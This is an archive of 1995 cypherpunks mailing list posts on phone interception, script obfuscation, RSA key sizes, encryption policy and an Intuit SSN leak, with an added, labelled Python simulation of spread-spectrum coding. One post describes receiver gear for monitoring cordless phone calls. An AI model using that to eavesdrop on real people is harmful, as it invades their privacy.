publicity-saving levitationisms. 'Tis superficially an expurgated part of
the Ruby Ridge-slippered Great Oz divulgation. Ostentatiously, the
preterite few surf the gilt-edged waves while Jose Sixpacks languish in
spider-webbed Quayle-spelt ghettoes populated by home page homeys.

For further emendations and emissions, behave normally and reply with a
blank message labelled:

XMAS_troll


--You Know Who






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 21 Dec 95 14:09:52 PST
To: Jyri Kaljundi <jk@jaramillo.digit.ee>
Subject: Re: FTC Privacy Initiative (fwd)
In-Reply-To: <Pine.SOL.3.91.951220212612.8508E-100000@jaramillo.digit.ee>
Message-ID: <Pine.SOL.3.91.951221140651.3315B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain




FWIW, Sunsite has always had a policy of following the guidelines of the 
American Library Association on both collections policy and use of access 
records. The ALA rules are pretty cool, and have the great advantage of 
being easily understood by administrators (it also means that you can 
rely on the library community as an ally in the event of challenges.)

Joe-Bob says check them out

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Thu, 21 Dec 95 12:25:30 PST
To: cypherpunks@toad.com
Subject: Re: 900mhz digital phones - how much to trust ?
Message-ID: <199512212046.OAA18997@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


>
>What's the current thinking on the security level of 900Mhz digital spread
>spectrum cordless phones? Clearly it's not a basic scanner job but how much
>more equipment is needed to monitor one ?

Well when you listen into a spread spectrum conversation what you will hear
is open squelch white noise.  The spread spectrum radios that I know about
send information on several different frequencies throughout the
conversation.  Unless you have a system to receive the encoding bit that
signals what frequency is next you can't easily find the next frequency before
it changes again.  This change happens several times a second.  The
information is "packet-like", that is why you are able to use so many spread
spectrum units at once.  Example, Lynx spread spectrum T1 information signal
(data) is combined with a high rate spreading code (chip sequence). A
multiplier performs the combination.  Because the spreading code is
pseudo-randomly generated, the combined signal occupies a significantly
expanded bandwidth with a lower uniform power density.  At the receiver, a
locally generated, synchronized replica of the spreading code recovers the
information signal, through a second multiplication.  The same code sequence
must be used in the transmitter and receiver to avoic losing the information. 

The coding is direct sequence, 16 x spreading rate, the number of codes is a
9 DIP switch selectable.

Intresting is taht the radio acquisition time is 500 msec, typical.  If this
a security hole I don't know.

Note this is typical of a Spread Spectrum Microwave radio, a lot of the same
applies to 900MHz T1 and cordless phones.  As soon as I have further info on
encryption of signal/Freq. destination I'll post it.

                Dr0id


( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)
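
The spreading and despreading described in the message above, as an added example that is not part of the original post or of any vendor's code: a toy direct-sequence link with 16 chips per data bit. Seeding a 9-stage LFSR from the switch setting, the two seed values and the sample data are assumptions made for illustration.

```python
"""Toy direct-sequence spread spectrum link: 16 chips per data bit."""

CHIPS_PER_BIT = 16  # the "16 x spreading rate" quoted in the post
LFSR_BITS = 9       # assumption: the 9 switch bits seed a 9-stage LFSR


def pn_chips(seed, count):
    """Return `count` chips (+1/-1) from the LFSR s[n+9] = s[n] ^ s[n+4].

    x^9 + x^4 + 1 is primitive, so every non-zero seed walks the same
    511-chip maximal-length sequence, only starting at a different phase.
    """
    if not 1 <= seed < (1 << LFSR_BITS):
        raise ValueError("seed must be 1..511; the all-zero state never advances")
    state, chips = seed, []
    for _ in range(count):
        chips.append(1 if state & 1 else -1)
        feedback = (state ^ (state >> 4)) & 1
        state = (state >> 1) | (feedback << (LFSR_BITS - 1))
    return chips


def spread(bits, seed):
    """Transmitter: multiply each data symbol (+1/-1) by its 16 code chips."""
    chips = pn_chips(seed, len(bits) * CHIPS_PER_BIT)
    signal = []
    for i, bit in enumerate(bits):
        symbol = 1 if bit else -1
        window = chips[i * CHIPS_PER_BIT:(i + 1) * CHIPS_PER_BIT]
        signal.extend(symbol * chip for chip in window)
    return signal


def despread(signal, seed):
    """Receiver: multiply by a local replica and sum over each bit period.

    Returns (bits, correlations). A synchronized replica of the right code
    gives +16 or -16 per bit; anything else gives a weaker, noise-like sum.
    """
    replica = pn_chips(seed, len(signal))
    bits, correlations = [], []
    for start in range(0, len(signal), CHIPS_PER_BIT):
        stop = start + CHIPS_PER_BIT
        corr = sum(s * r for s, r in zip(signal[start:stop], replica[start:stop]))
        correlations.append(corr)
        bits.append(1 if corr > 0 else 0)
    return bits, correlations


def bit_errors(sent, received):
    """Count positions where the recovered bit differs from the sent bit."""
    return sum(a != b for a, b in zip(sent, received))


# Constructed sample input: 64 data bits and two made-up switch settings.
DATA = [int(b) for b in format(0xC0FFEE1234ABCDEF, "064b")]
TX_SEED = 0b101100111     # setting shared by transmitter and receiver
WRONG_SEED = 0b101100110  # one switch different: same sequence, other phase


def demo():
    """Despread one transmission with the matching and a non-matching replica."""
    signal = spread(DATA, TX_SEED)
    good_bits, good_corr = despread(signal, TX_SEED)
    bad_bits, bad_corr = despread(signal, WRONG_SEED)
    return {
        "good_errors": bit_errors(DATA, good_bits),
        "good_min_abs_corr": min(abs(c) for c in good_corr),
        "bad_errors": bit_errors(DATA, bad_bits),
        "bad_max_abs_corr": max(abs(c) for c in bad_corr),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

In this model a different switch setting is the same sequence at another phase, so the non-matching case also stands in for a receiver that has not yet synchronized. Nine two-position switches allow at most 2^9 = 512 settings, far too few for the code setting to act as a secret key.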







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Thu, 21 Dec 95 12:25:51 PST
To: cypherpunks@toad.com
Subject: Re: ex encrypted script
Message-ID: <199512212047.OAA19022@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


>
>| Is there a way to encrypt a script yet still allow it to be runnable?  I
>| know that the simple answer is to write it in C and compile it but I don't
>| have the means of doing that at the moment.  (i.e. there is no compiler on
>| the system)
>| 
>| I thought of a few simple protections but they all involve decrypting before
>| running.
>
>	Ever hear of chmod?  chown?
>Adam

The vendor also has superuser access..  chmod chown won't protect it.. :(


( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 21 Dec 95 15:11:04 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <acfe321c01021004d5c5@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951221145251.3728B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net wrote:

> Not in cracking "truly large" problems by brute force. Even if each of the
> million processors is capable of 100 MIPS (which is unlikely, given the PIM
> approach and the fine-granularity, few-bit-or-less word size, etc.), this
> is only 10^8 MIPS. For problems that (for instance) 10^75 machines would
> have to spend 10^10 years on, not even a drop in an ocean.

The problem is there are still people and organizations that use 512-bit 
RSA keys.  The DOE recently awarded Intel a contract to build a 
computer with 9072 Pentium Pro processors.  I doubt that it will be used 
for factoring keys, but if it were, it will be able to factor a 512-bit 
number in a matter of months.

The boundary delimiting "truly large" problems and merely extremely 
expensive ones inches up all the time.  Less than a decade ago people 
thought factoring RSA-129 was a "truly large" problem.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Thu, 21 Dec 95 13:43:08 PST
To: David Mandl <dmandl@bear.com>
Subject: Re: KOD
In-Reply-To: <Pine.SUN.3.91.951220160232.4338q-100000@goya>
Message-ID: <Pine.SOL.3.91.951221163817.26896A-100000@echonyc.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh come on, be a sport.  

On Wed, 20 Dec 1995, David Mandl wrote:

> On Wed, 20 Dec 1995, John Young wrote:
> 
> > Congratulations to the cypherpunks named Newsweek's "Big 
> > Thinkers of tomorrow -- the list of 50 People Who Matter Most 
> > on the Internet." In the December 25 issue.
> 
> Can you reveal who they are?  No way am I going to buy Newsweek to
> find out.
> 
>    --Dave.
> 
> --
> David Mandl
> Bear, Stearns & Co. Inc.
> Phone: (212) 272-3888
> Email: dmandl@bear.com
> 
> --
> *******************************************************************************
> Bear Stearns is not responsible for any recommendation, solicitation, offer or
> agreement or any information about any transaction, customer account or account
> activity contained in this communication.
> *******************************************************************************
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Light Ray <fricke@mae.engr.ucdavis.edu>
Date: Thu, 21 Dec 95 16:52:17 PST
To: ECafe Anonymous Remailer <cpunk@remail.ecafe.org>
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512210112.BAA05503@pangaea.ang.ecafe.org>
Message-ID: <Pine.HPP.3.91.951221165411.6535B-100000@roboben.engr.ucdavis.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 21 Dec 1995, ECafe Anonymous Remailer wrote:

> ATT and Netscape are both tools of the CIA/NSA.
> Blaze and Weinstein are in on the
> plot to force GAK upon us.  Neither one
> says enough about the evils of GAK on their
> web page, so they're obviously for GAK and
> only pretending to be against it to fool
> the cypherpunks and curry favor with their NSA
> masters.

Hmm.  You don't happen to be a conspiracy theorist,
do you?

Tobin Fricke





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 21 Dec 95 17:21:39 PST
To: paul.elliott@hrnowl.lonestar.org (Paul Elliott)
Subject: Re: GAK boycott, What are legal implications?
In-Reply-To: <30d9ca78.flight@flight.hrnowl.lonestar.org>
Message-ID: <199512220119.RAA23373@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


> Here is a question for all of you cyber legal types out there.
> This question presupposes:
> 
> The NIST will complete its work on the GAK standard. But no law will be
> passed (yet) regulating the use of encryption in the U. S. (The GAK standard
> is an attempt to create an environment in which such laws can be passed.)
> In the U.S., Big Company INC will start marketing a GAKed encryption
> product domestically.
> 
> A bunch of cypherpunkish types will immediately try to organize a boycott
> against BIG COMPANY.

I think it's more likely that a group of people will work on
breaking Big Co's GAKed product.  Either finding a flaw
in its algorithm or protocol that can be exploited, or
a flaw that renders its GAK unusable, i.e. Matt Blaze's
LEAF hack on Clipper.

> What are the cypherpunks legal risks?
> 
> I seem to remember that back in the 70s, the NAACP lost a big case
> with respect to their boycott in a southern city. As I recall there were people
> in the street begging money for the NAACP because there was a > 10**6 $
> judgement against the NAACP and they needed that much just to appeal.

Well, NAACP is an actual organization with papers filed
with the IRS, officers or some sort of board members, offices, etc.

Cypherpunks is just a mailing list, and many of the members
of the list don't use their real identities on the list.

Who would they go after?


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Light Ray <fricke@mae.engr.ucdavis.edu>
Date: Thu, 21 Dec 95 17:50:02 PST
To: jim bell <jimbell@pacifier.com>
Subject: Re: Microsoft Flame[tm] [NOISE]
In-Reply-To: <m0tSpkY-0008ynC@pacifier.com>
Message-ID: <Pine.HPP.3.91.951221174959.6685C-100000@roboben.engr.ucdavis.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 21 Dec 1995, jim bell wrote:

> Well, I disagree.  Microsoft succeeded  primarily because it was "chosen" by
> IBM in about 1981 or so, needing an OS for their PC.  MS didn't even write
> it; Seattle Computer did, and that was a port of CP/M.  Not much creativity.
> MSDOS revisions 1.0 and 1.1 were pure crap.

I'm sure that's true to a large extent.  However, although I may be 
wrong, I believe that MS's primary reason for initial success was in MS 
BASIC.  They needed a new OS to go with BASIC, so they used DOS.  They 
needed a new filesystem to store BASIC files, and thus FAT was born.

Tobin Fricke
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 21 Dec 95 09:06:58 PST
To: cypherpunks@toad.com
Subject: FWD: Intuit and SSNs
Message-ID: <199512211706.SAA10738@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


What does our man in Intuit have to say about this? 

>  Date: 18 Dec 1995 19:10:07 -0800
>  From: michael@piglet.amscons.com (Michael Bryan)
>  Subject: SSN Shown On Payments by Intuit's Banking Service
>  Organization: none
>  
>  Another user (Robert Mayo) discovered, and I confirmed, that Intuit's
>  online bill payment service sends your payees a printout containing
>  your social security number.
>  
>  This applies to any person who is using Quicken for Windows or
>  Microsoft Money for Windows to send payment requests electronically,
>  using Intuit's service.  It specifically does -not- apply to using
>  Quicken with the Checkfree service, as the Checkfree service does not
>  supply anybody with your SSN.
>  
>  The details:
>  
>  When the Intuit service sends a payment to a merchant, it will do one
>  of three things.  First, it will try to perform an EFT directly from
>  your account into the merchant's.  Most merchants are still not set up
>  for this, however.  Second, if your payment is the only payment going
>  to a given merchant on a given day, then they will print a check, drawn
>  against your account, and mail it to the merchant.  Both of these
>  methods are ok, and do not result in your merchant receiving your SSN.
>  
>  However, if there are multiple payments going to a single merchant on a
>  given day (i.e., more than one customer has requested a payment to the
>  given merchant), all of these payments are sent in a single envelope,
>  and a summary sheet is enclosed.  This summary sheet will have a field
>  called "Control Number", which consists of your SSN, followed by two
>  other digits.  This summary also lists your checking account number, in
>  addition to your name, account with the merchant, and the amount of
>  your payment.  (In my opinion, only these last three fields are called
>  for.  There is no need for the checking account number to be listed,
>  even though it -is- printed on your check as part of the MICR
>  encoding.)
>  
>  I have contacted Intuit regarding this matter, and they have been
>  decidedly less than helpful.  I know at least three other people who
>  have called them, and we have all been told the same thing:
>  
>  1) "Most of your merchants already have your SSN".  Perhaps this is
>  true for some people, but it is not the case with me.
>  
>  2) "The SSN is encrypted on the printout".  Absolutely not true.  It is
>  printed under the label "Control Number", and has two extra digits
>  appended, but this does not "encrypt" the number.  Anybody who knows
>  what the field contains has instant knowledge of your SSN.
>  
>  Intuit is currently refusing to address this issue.  Furthermore, when
>  I called in, they tried to tell me I was the only person who was
>  complaining.  I immediately gave them the names of three other people
>  who had called in, one of whom I knew had talked to this particular
>  individual.  So that little "divide-and-conquer" trick backfired.
>  
>  Also, when I said that I would be forced to go to the media if they
>  didn't address this issue, I was told that by doing so, I would be
>  responsible for broadcasting this information to those who might then
>  illegally use the information.  I found this two-faced attitude
>  particularly annoying.  On the one hand, they are claiming it's not a
>  problem, yet on the other they tried to keep me from going to the media
>  because it might give criminals information they could then exploit.
>  
>  Anyway, I've done all I can with talking to Intuit, so I am now
>  pursuing other avenues.  My bank (Union Bank) was particularly
>  concerned that the SSN was being printed out and mailed with
>  potentially every payment, and vowed to look into it and work with
>  Intuit on my behalf to get this behaviour stopped.  Also, I and a few
>  others have contacted various media representatives, in an attempt to
>  get them to focus a spotlight on Intuit, and let people know that
>  Intuit is broadcasting their SSN, without their knowledge.  And of
>  course, I'm posting Usenet articles in the privacy newsgroups, as well
>  as the newsgroup where most Quicken discussion occurs,
>  comp.os.ms-windows.apps.financial.
>  
>  If you are using Intuit's Online Bill Payment service, and are
>  concerned about this, please call Intuit and express your displeasure.
>  The number for the Online Bill Payment service is 708-585-8500.  Also,
>  call your bank, and inform them as to what's going on.  Finally, write
>  to your local (or national) newspaper, let them know about this, and
>  ask them to cover this in their paper.
>  
>  It appears that the only way Intuit is going to address this is by
>  getting some negative publicity, since customer complaints don't seem
>  to carry enough weight.  I wish they were more reasonable, but that
>  just doesn't seem to be happening here.  So be it --- they want a
>  fight, they've got one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 21 Dec 95 15:07:32 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Encryption Rules Coming
In-Reply-To: <199512211605.LAA00150@pipe3.nyc.pipeline.com>
Message-ID: <199512212307.SAA14030@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


>    Financial Times, December 21, 1995, p. 4.
> 
>    Encryption rules to be prepared
> 
>    By Andrew Jack in Paris
> 
>    Representatives of international business and government
>    yesterday agreed to draw up guidelines on encryption, 
[...]
>    The meeting, which was held at the International Chamber of
>    Commerce in Paris, could lead to formal propositions
>    prepared jointly by business and government organisations
>    that could be ready by as soon as next summer.
[...]
>    However, many governments
[...]
>    have demanded that they should be able to "hack" into
>    computer transmissions for counter-intelligence and
>    criminal investigation work, in the same way that they can
>    conduct telephone-tapping exercises.
> 
>    An important conclusion of yesterday's Paris meeting was
>    that business agreed in principle to allow such hacking to
>    take place as long as sufficient safeguards were in place
>    and "electronic search warrants" had been issued with
>    proper judicial approval.
[...]

The Int'l. Chamber of Commerce turns out to have Web pages. Their latest
press release on the web came out last week, describing the upcoming
conference: "Business and governments seek agreed policy on encryption of
electronic messages" <http://spider.usa1.com/~ibnet/iccpr883.html>

A few excerpts:

"OECD governments are participating in the two day conference, together with 
representatives of the International Chamber of Commerce (ICC), the Business 
and Industry Advisory Committee to the OECD (BIAC), and information 
technology associations covering Europe, Canada, Japan, and the United States."

"An ICC expert, Stefan Bernhard, said: `Just as government agencies are 
obliged to seek court warrants before making physical searches within a 
company, or in the home of a private person, the same restrictions should 
apply on the information superhighway.'"

"For further information contact Lionel Walsh at the ICC communications 
division (33 1) 49 53 28 23. Email - ICCOM@ibnet.com"

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Thu, 21 Dec 95 15:14:28 PST
To: cypherpunks@toad.com
Subject: Telcom bill report
Message-ID: <01HZ2U34JNWW8Y53CL@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Here's the additional info from Reuters. As usual, Clinton is being a
coward. For additional Cypherpunks relevance, anonymous remailer operators in
the US may need to watch out.
	-Allen

   Reuters New Media
   
   _ Thursday December 21 2:11 PM EST _
   
Congress Reaches Compromise On Telecom Reform

   WASHINGTON - Congressional conferees have agreed to a sweeping reform
   of telecommunications law that would open competition by allowing the
   telephone, cable and broadcast industries to invade the others' turf.
   
   Vice President Gore says President Clinton will sign the bill. Before
   the agreement, the president had been threatening for months to veto
   the bill if Republicans in Congress did not retreat on a long list of
   issues. They retreated.
   
   Vice President Al Gore said "This will unleash a new era in the
   telecommunications revolution and speed completion of the information
   highway."
   
   The bill would also impose tough new restrictions on sexual material
   on online services. It has been bitterly opposed by civil rights
   groups who say the controls on sexual content constitute censorship.
   
   The legislation would impose fines of up to $100,000 and prison terms
   of up to two years on people who make "indecent" material
   available to minors over computer networks. That could pose big
   problems for companies that provide online information services.
   
   The "cyberporn" issue was championed by conservative
   religious groups, including the Christian Coalition, and is certain to
   provoke a new courtroom battle over Constitutional rights to free
   speech.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 21 Dec 95 15:32:53 PST
To: cypherpunks@toad.com
Subject: Telcom bill report
Message-ID: <199512212332.SAA13156@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by EALLENSMITH@ocelot.Rutgers.EDU ("E. ALLEN 
SMITH") on Thu, 21 Dec  6:12 PM

   
>   The "cyberporn" issue was championed by conservative
>   religious groups, including the Christian Coalition, and is certain to
>   provoke a new courtroom battle over Constitutional rights to free
>   speech.


In the NYT the sentence above was followed by:


"Indeed, the measure includes a provision that requires a 
Federal court in Washington to take up the issue almost as soon 
as someone challenges its legality."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: floyddb@alpha.c2.org
Date: Thu, 21 Dec 95 19:07:52 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512220241.SAA14531@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


andr0id@midwest.net (Jason Rentz) wrote:

>>
>>What's the current thinking on the security level of 900MHz digital spread
>>spectrum cordless phones? Clearly it's not a basic scanner job but how much
>>more equipment is needed to monitor one ?
>
>Well, when you listen in to a spread spectrum conversation what you will hear
>is open squelch white noise.  The spread spectrum radios that I know about
>send information on several different frequencies throughout the
>conversation.  

        [snip]

>                Dr0id
>
>
>( Computer Consulting & Management   )
>(P.O. Box 421  Cambria, IL 62915-0421)
>

        [snip]
        There is a company called Optoelectronics that markets a radio receiver 
         called the Interceptor.  This is a broad band (several hundred MHz) 
         device designed to lock on to the most powerful signal around,
         regardless of frequency.  As supplied, it only has a rubber duck 
         antenna, but a broadband, directional antenna (Log Periodic?) could be 
         attached.  There are AM and FM versions that output audio and a version
         called the Scout that controls a scanner.  These could have outboard 
         devices hung on to them to decode digital signals, record the 
         conversation ... all for less than $1000.

        

        Floyd D. Barber
        floyddb@alpha.c2.org
        Key fingerprint:
        8A 98 1F 6B 70 7A FE 24 
        35 D4 48 CF 9D F6 B0 91


        PS Sameer, thanks for the nym.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 21 Dec 95 16:12:06 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Telcom bill report
In-Reply-To: <01HZ2U34JNWW8Y53CL@mbcl.rutgers.edu>
Message-ID: <199512220011.TAA15741@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


>    The legislation would impose fines of up to $100,000 and prison terms
>    of up to two years on people who make "indecent" material
>    available to minors over computer networks. That could pose big
>    problems for companies that provide online information services.

Perhaps my memory is faulty, but it seems to me that the wording of this part
of the bill (S.652) has been amended a bit. Sec. 402 of 652 now amends Section 
223 (47 U.S.C. 223) subsection (a) to fine or imprison whoever "knowingly 
permits any telecommunications facility under his control to be used for any 
activity prohibited by paragraph (1) [indecent communication with intent to 
annoy blah blah] with the intent that it be used for such activity". (this is
from the "House Appropriation Bill as Passed by the Senate" version of S.652
on http://thomas.loc.gov)

This (new, I think) part requiring "intent that it be used for such activity"
looks like an enormous loophole to me. I can't think of many people who
provide communications services _with the intent that they be used to harass
[etc.] others with obscene [etc.] communications_. 

Could a lawyer comment on why intent would be easier to establish than I
believe offhand ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Thu, 21 Dec 95 20:58:29 PST
To: "Beavis B. Thoopit" <andr0id@midwest.net (Jason Rentz)
Subject: Re: ex encrypted script
Message-ID: <199512220457.UAA05102@software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 PM 12/21/95 -0500, Beavis B. Thoopit wrote:
>> >| Is there a way to encrypt a script yet still allow it to be runnable?  I
>> >| know that the simple answer is to write it in C and compile it but I don't
>> >| have the means of doing that at the moment.  (i.e. there is no compiler on
>> >| the system)
>> >| 
>> >| I thought of a few simple protections but they all involve decrypting before
>> >| running.
>> >
>> >	Ever hear of chmod?  chown?
>> >Adam
>> 
>> The vendor also has superuser access..  chmod chown won't protect it.. :(
>
>I once had to obfuscate an awk script.  "Cryptography is Economics."  My
>job was to make it difficult for the enemy to steal the source.  There
>was a license agreement...
>
>The simple answer of "no" is right in the strong sense, but there are
>tricks to make life difficult for the amateur attacker.
>
>My approach was a self-decrypting program.  The "real" script was
>encrypted within the body of the encasing script.  For increased
>obfuscation, decrypt only small pieces at a time.
>
>
There is encrypt and then there is render useless to the reader.

A tale I hear is that when HP had to deliver operating system source to
the French government they stripped all comments and changed all variable
and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
It still compiled but was 100% useless to human readers.


--
John Pettitt
email:         jpettitt@well.sf.ca.us (home)
               jpp@software.net       (work)    






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Thu, 21 Dec 95 14:08:38 PST
To: libernet@dartmouth.edu
Subject: GAK boycott, What are legal implications?
Message-ID: <30d9ca78.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here is a question for all of you cyber legal types out there.
This question presupposes: 

The NIST will complete its work on the GAK standard. But no law will be
passed (yet) regulating the use of encryption in the U. S. (The GAK standard 
is an attempt to create an environment in which such laws can be passed.) 
In the U.S., Big Company INC will start marketing a GAKed encryption 
product domestically.

A bunch of cypherpunkish types will immediately try to organize a boycott
against BIG COMPANY.

What are the cypherpunks legal risks?

I seem to remember that back in the 70s, the NAACP lost a big case
with respect to their boycott in a southern city. As I recall there were people
in the street begging money for the NAACP because there was a > 10**6 $
judgement against the NAACP and they needed that much just to appeal.


- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNnJ8/BUQYbUhJh5AQGbsgP/T0n31SqeuHt+7AbizymcEhu/78DUuym5
sj+MO3ruA9WcEBQUXfabuf/PgOwlrtUAcC3dISPvXwGbdygc9oHBfxSglLi48g7d
dvDS4wziRHF7N8sBsYn0ee9YyKhPd9U7Ci0ovOc5frFGSZ2Bt4hU703d7bR+6cB+
iHHqsPaAa6o=
=EPoj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Chen <chen@best.com>
Date: Thu, 21 Dec 95 21:37:39 PST
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: FWD: Intuit and SSNs
In-Reply-To: <199512211706.SAA10738@utopia.hacktic.nl>
Message-ID: <199512220537.VAA11469@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> What does our man in Intuit have to say about this? 

Well, the check-writing business does not really fall within my
purview, but I'll see if the report is true.  Pretty idiotic, if so.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/944-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Thu, 21 Dec 95 19:59:25 PST
To: andr0id@midwest.net (Jason Rentz)
Subject: Re: ex encrypted script
In-Reply-To: <199512212047.OAA19022@cdale1.midwest.net>
Message-ID: <199512220357.WAA02638@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


> >| Is there a way to encrypt a script yet still allow it to be runnable?  I
> >| know that the simple answer is to write it in C and compile it but I don't
> >| have the means of doing that at the moment.  (i.e. there is no compiler on
> >| the system)
> >| 
> >| I thought of a few simple protections but they all involve decrypting before
> >| running.
> >
> >	Ever hear of chmod?  chown?
> >Adam
> 
> The vendor also has superuser access..  chmod chown won't protect it.. :(

I once had to obfuscate an awk script.  "Cryptography is Economics."  My
job was to make it difficult for the enemy to steal the source.  There
was a license agreement...

The simple answer of "no" is right in the strong sense, but there are
tricks to make life difficult for the amateur attacker.

My approach was a self-decrypting program.  The "real" script was
encrypted within the body of the encasing script.  For increased
obfuscation, decrypt only small pieces at a time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Thu, 21 Dec 95 21:01:30 PST
To: cypherpunks@toad.com
Subject: Newsweek Nerd 50
Message-ID: <v01530502acffea606402@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


Okay, while you other cypherpunks were grousing about how you weren't going
to give Newsweek your hard-earned currency, I bought a copy. My pain, your
gain (on a significantly smaller scale than that messiah figure some of us
celebrate next week.)

Cypherpunk Notables on the List: "Newsweek's Epithet"

Phil Zimmermann: "Crypto Creator"

Marc Rotenberg: "Privacy Advocate"

Sameer Parekh: "Protector of Privacy"

Johan Helsingius: "Crusader"

and Steven Levy, who sometimes posts here, has the byline on the "Year of
the Net" feature.

PS to Newsweek -- Prof. Hoffman should be called a "Data Goddess" not a
"Geek" for exposing those bogus factors the marketdroids want to use to
control their survey data back up to the population level.

Happy Holidays
Piss off Ralph Reed, Defend the 1st Amendment.

Bill Humphries






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 21 Dec 95 23:20:20 PST
To: cypherpunks@toad.com
Subject: Re: ex encrypted script
Message-ID: <v0153050fad000b64a813@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>At 10:57 PM 12/21/95 -0500, Beavis B. Thoopit wrote:
>>> >| Is there a way to encrypt a script yet still allow it to be runnable?  I
>>> >| know that the simple answer is to write it in C and compile it but I don't
>>> >| have the means of doing that at the moment.  (i.e. there is no compiler on
>>> >| the system)
>>> >|
>>> >| I thought of a few simple protections but they all involve decrypting before
>>> >| running.
>>> >
>>> >    Ever hear of chmod?  chown?
>>> >Adam
>>>
>>> The vendor also has superuser access..  chmod chown won't protect it.. :(
>>
>>I once had to obfuscate an awk script.  "Cryptography is Economics."  My
>>job was to make it difficult for the enemy to steal the source.  There
>>was a license agreement...
>>
>>The simple answer of "no" is right in the strong sense, but there are
>>tricks to make life difficult for the amateur attacker.
>>
>>My approach was a self-decrypting program.  The "real" script was
>>encrypted within the body of the encasing script.  For increased
>>obfuscation, decrypt only small pieces at a time.
>>
>>
>There is encrypt and then there is render useless to the reader.
>
>A tale I hear is that when HP had to deliver operating system source to
>the French government they stripped all comments and changed all variable
>and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
>It still compiled but was 100% useless to human readers.

There is a commercial product out there from Gimpel Software called _The C
Shroud_. It removes all structure from the code, replacing it with gotos,
renames all the symbols to axxxxxxx, converts constants and strings to hex,
